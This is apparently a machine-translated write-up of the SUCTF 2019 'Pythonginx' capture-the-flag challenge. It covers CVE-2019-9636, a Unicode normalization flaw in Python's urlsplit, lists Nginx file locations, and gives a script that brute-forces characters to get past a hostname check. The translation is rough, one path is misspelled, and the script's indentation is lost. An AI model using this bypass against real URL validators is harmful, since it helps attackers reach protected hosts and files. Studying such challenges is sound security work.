table of Contents
Brush title record: [SUCTF 2019] Pythonginx
Recurring topic links: https://buuoj.cn/challenges
Reference Links: 2019 SUCTF WP
SUCTF_2019_ part reproducibility
One, involving knowledge points
1, CVE-2019-9636: urlsplit without standardized processing NFKC
https://bugs.python.org/issue36216
2, Nginx location of important documents
- Configuration files directory: / etc / nginx
- The main configuration file: /etc/nginx/conf/nginx.conf
- Management script: /usr/lib64/systemd/system/nginx.service
- Module: / usr / lisb64 / nginx / modules
- Application: / usr / sbin / nginx
- Program default storage location: / usr / share / nginx / html
- The default log storage location: / var / log / nginx
Second, problem-solving approach
Copy script
from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
for x in range(65536):
uni=chr(x)
url="http://suctf.c{}".format(uni)
try:
if getUrl(url):
print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
except:
pass
def getUrl(url):
url = url
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return False
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return False
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return True
else:
return False
if __name__=="__main__":
get_unicode()Although the thought may be the coding problem, but no hands to write a script to run, a lazy dog.
There wp is to search on github, and indeed the world's largest gay dating site, next time can not be limited to Baidu